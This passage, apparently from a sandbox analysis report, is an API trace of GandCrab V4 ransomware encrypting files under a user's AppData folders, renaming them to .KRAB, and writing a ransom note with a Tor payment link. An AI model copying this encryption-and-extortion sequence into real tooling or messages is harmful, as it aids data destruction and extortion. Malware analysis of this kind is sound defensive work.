lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\*", lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0xfbd8e0 [0061.381] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.381] FindNextFileW (in: hFindFile=0xfbd8e0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0061.381] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0061.381] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.381] FindNextFileW (in: hFindFile=0xfbd8e0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0061.381] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0061.381] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0061.381] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\d2ca4a08d2ca4dee3d.lock" [0061.381] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0061.382] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 89 [0061.382] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\d2ca4a08d2ca4dee3d.lock") returned 84 [0061.382] lstrlenW (lpString=".lock") returned 5 [0061.382] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0061.382] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0061.382] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.382] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.383] FindNextFileW (in: hFindFile=0xfbd8e0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0061.383] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0061.383] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0061.383] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\KRAB-DECRYPT.txt" [0061.383] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0061.383] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\KRAB-DECRYPT.txt.KRAB") returned 82 [0061.383] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\KRAB-DECRYPT.txt") returned 77 [0061.383] lstrlenW (lpString=".txt") returned 4 [0061.383] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0061.383] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0061.383] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.383] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\KRAB-DECRYPT.txt") returned 77 [0061.383] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\KRAB-DECRYPT.txt") returned 77 [0061.384] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0061.384] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0061.384] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0061.384] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0061.384] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0061.384] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0061.384] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0061.384] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0061.384] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0061.384] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0061.384] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.384] FindNextFileW (in: hFindFile=0xfbd8e0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0061.384] lstrcmpW (lpString1="Preferences.dat", lpString2=".") returned 1 [0061.384] lstrcmpW (lpString1="Preferences.dat", lpString2="..") returned 1 [0061.384] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\", lpString2="Preferences.dat" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\Preferences.dat") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\Preferences.dat" [0061.384] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0061.384] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\Preferences.dat.KRAB") returned 81 [0061.384] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\Preferences.dat") returned 76 [0061.384] lstrlenW (lpString=".dat") returned 4 [0061.384] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0061.385] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".dat ") returned 5 [0061.385] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.385] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\Preferences.dat") returned 76 [0061.385] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\Preferences.dat") returned 76 [0061.385] lstrcmpiW (lpString1="Preferences.dat", lpString2="desktop.ini") returned 1 [0061.385] lstrcmpiW (lpString1="Preferences.dat", lpString2="autorun.inf") returned 1 [0061.385] lstrcmpiW (lpString1="Preferences.dat", lpString2="ntuser.dat") returned 1 [0061.385] lstrcmpiW (lpString1="Preferences.dat", lpString2="iconcache.db") returned 1 [0061.385] lstrcmpiW (lpString1="Preferences.dat", lpString2="bootsect.bak") returned 1 [0061.385] lstrcmpiW (lpString1="Preferences.dat", lpString2="boot.ini") returned 1 [0061.385] lstrcmpiW (lpString1="Preferences.dat", lpString2="ntuser.dat.log") returned 1 [0061.385] lstrcmpiW (lpString1="Preferences.dat", lpString2="thumbs.db") returned -1 [0061.385] lstrcmpiW (lpString1="Preferences.dat", lpString2="KRAB-DECRYPT.html") returned 1 [0061.385] lstrcmpiW (lpString1="Preferences.dat", lpString2="KRAB-DECRYPT.txt") returned 1 [0061.385] lstrcmpiW (lpString1="Preferences.dat", lpString2="CRAB-DECRYPT.txt") returned 1 [0061.385] lstrcmpiW (lpString1="Preferences.dat", lpString2="ntldr") returned 1 [0061.385] lstrcmpiW (lpString1="Preferences.dat", lpString2="NTDETECT.COM") returned 1 [0061.385] lstrcmpiW (lpString1="Preferences.dat", lpString2="Bootfont.bin") returned 1 [0061.385] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0061.386] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbca08) returned 1 [0061.386] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f60000 [0061.386] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0061.387] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0061.387] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x20, pbBuffer=0x338e7cc | out: pbBuffer=0x338e7cc) returned 1 [0061.387] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0061.387] VirtualFree (lpAddress=0x2f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.387] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbca08) returned 1 [0061.387] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f60000 [0061.388] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0061.388] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0061.388] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x8, pbBuffer=0x338e7ec | out: pbBuffer=0x338e7ec) returned 1 [0061.388] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0061.388] VirtualFree (lpAddress=0x2f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.388] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbca08) returned 1 [0061.389] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0xfbd820) returned 1 [0061.389] CryptGetKeyParam (in: hKey=0xfbd820, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0061.389] CryptEncrypt (in: hKey=0xfbd820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338e75c*=0x100) returned 1 [0061.389] GetLastError () returned 0x0 [0061.389] CryptDestroyKey (hKey=0xfbd820) returned 1 [0061.389] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0061.389] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbca08) returned 1 [0061.390] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0xfbd720) returned 1 [0061.390] CryptGetKeyParam (in: hKey=0xfbd720, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0061.390] CryptEncrypt (in: hKey=0xfbd720, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338e75c*=0x100) returned 1 [0061.390] GetLastError () returned 0x0 [0061.390] CryptDestroyKey (hKey=0xfbd720) returned 1 [0061.390] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0061.390] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\Preferences.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\onenote\\16.0\\preferences.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0061.391] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0061.391] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0061.392] ReadFile (in: hFile=0x448, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e7fc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338e7fc*=0x1440, lpOverlapped=0x0) returned 1 [0061.419] SetFilePointerEx (in: hFile=0x448, liDistanceToMove=0xffffebc0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.419] WriteFile (in: hFile=0x448, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x1440, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338e7f8*=0x1440, lpOverlapped=0x0) returned 1 [0061.419] WriteFile (in: hFile=0x448, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338e7f8*=0x208, lpOverlapped=0x0) returned 1 [0061.419] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.431] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.432] CloseHandle (hObject=0x448) returned 1 [0061.440] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.440] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\Preferences.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\onenote\\16.0\\preferences.dat"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\Preferences.dat.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\onenote\\16.0\\preferences.dat.krab")) returned 1 [0061.441] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.441] FindNextFileW (in: hFindFile=0xfbd8e0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0 [0061.441] FindClose (in: hFindFile=0xfbd8e0 | out: hFindFile=0xfbd8e0) returned 1 [0061.442] CloseHandle (hObject=0x440) returned 1 [0061.517] FindNextFileW (in: hFindFile=0xfbd8a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0061.517] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0061.517] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0061.517] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\d2ca4a08d2ca4dee3d.lock" [0061.517] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0061.522] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 84 [0061.522] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\d2ca4a08d2ca4dee3d.lock") returned 79 [0061.522] lstrlenW (lpString=".lock") returned 5 [0061.522] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0061.522] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0061.522] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.522] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.523] FindNextFileW (in: hFindFile=0xfbd8a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0061.523] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0061.523] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0061.523] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\KRAB-DECRYPT.txt" [0061.523] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0061.523] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\KRAB-DECRYPT.txt.KRAB") returned 77 [0061.523] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\KRAB-DECRYPT.txt") returned 72 [0061.523] lstrlenW (lpString=".txt") returned 4 [0061.523] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0061.523] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0061.524] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.524] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\KRAB-DECRYPT.txt") returned 72 [0061.524] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\OneNote\\KRAB-DECRYPT.txt") returned 72 [0061.524] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0061.524] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0061.524] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0061.524] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0061.524] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0061.524] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0061.524] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0061.524] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0061.524] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0061.524] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0061.524] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.524] FindNextFileW (in: hFindFile=0xfbd8a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0061.525] FindClose (in: hFindFile=0xfbd8a0 | out: hFindFile=0xfbd8a0) returned 1 [0061.525] CloseHandle (hObject=0x3ac) returned 1 [0061.525] FindNextFileW (in: hFindFile=0xfbd560, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0061.525] lstrcmpW (lpString1="Outlook", lpString2=".") returned 1 [0061.525] lstrcmpW (lpString1="Outlook", lpString2="..") returned 1 [0061.525] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="Outlook" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook" [0061.525] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\" [0061.525] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0061.525] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0061.526] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0061.526] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0061.526] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0061.526] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.526] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0061.526] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\\\KRAB-DECRYPT.txt") returned 73 [0061.526] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\outlook\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0061.527] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC 